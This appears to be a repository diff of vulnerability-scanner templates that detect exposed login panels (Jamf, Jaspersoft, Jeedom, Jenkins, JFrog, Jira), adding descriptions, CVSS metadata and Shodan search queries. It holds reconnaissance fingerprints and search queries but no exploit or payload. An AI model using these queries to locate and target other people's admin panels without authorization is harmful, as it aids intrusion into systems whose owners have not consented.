name: Jamf Pro Login
name: Jamf Pro Login Panel - Detect
author: DhiyaneshDk
severity: info
description: Jamf Pro login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Jamf Pro"
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 401
# Enhanced by md on 2022/11/21

9
exposed-panels/jamf-panel.yaml
View File

@ -1,9 +1,14 @@
id: jamf-panel
info:
name: JAMF MDM Panel
name: Jamf MDM Login Panel - Detect
author: pdteam,idealphase
severity: info
description: Jamf Mobile Device Management login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.favicon.hash:1262005940
tags: jamf,panel,mdm
@ -30,3 +35,5 @@ requests:
group: 1
regex:
- '<meta name=\"version\" content=\"(.*)\">'
# Enhanced by md on 2022/11/21

9
exposed-panels/jamf-setup-assistant.yaml
View File

@ -1,9 +1,14 @@
id: jamf-setup-assistant
info:
name: Jamf Pro Setup Assistant
name: Jamf Pro Setup Assistant Panel - Detect
author: ritikchaddha
severity: info
description: Jamf Pro Setup Assistant panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"Jamf Pro Setup"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/jaspersoft-panel.yaml
View File

@ -1,9 +1,14 @@
id: jaspersoft-panel
info:
name: Jaspersoft Panel Login
name: TIBCO Jaspersoft Login Panel - Detect
author: koti2,daffainfo
severity: info
description: TIBCO Jaspersoft login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Jaspersoft"
tags: panel,jaspersoft
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/jeedom-panel.yaml
View File

@ -1,9 +1,14 @@
id: jeedom-panel
info:
name: Jeedom Login Panel
name: Jeedom Login Panel - Detect
author: pikpikcu,daffainfo
severity: info
description: Jeedom login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Jeedom"
tags: panel,jeedom,login
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

12
exposed-panels/jenkins-api-panel.yaml
View File

@ -1,10 +1,14 @@
id: jenkins-api-panel
info:
name: Jenkins API Instance Detection Template
name: Jenkins API Panel - Detect
author: righettod
severity: info
description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint
description: Jenkins API panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,api,jenkins
requests:
@ -20,4 +24,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/jfrog-login.yaml
View File

@ -1,11 +1,16 @@
id: jfrog-login
info:
name: JFrog Login
name: JFrog Login Panel - Detect
author: dhiyaneshDK
severity: info
description: JFrog login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6797
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,jfrog,edb
requests:
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/jira-detect.yaml
View File

@ -1,9 +1,14 @@
id: jira-detect
info:
name: Detect Jira Issue Management Software
name: Jira Login Panel - Detect
author: pdteam,philippedelteil
severity: info
description: Jira login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,jira
requests:
@ -27,3 +32,5 @@ requests:
group: 1
regex:
- 'title="JiraVersion" value="([0-9.]+)'
# Enhanced by md on 2022/11/21

Some files were not shown because too many files have changed in this diff Show More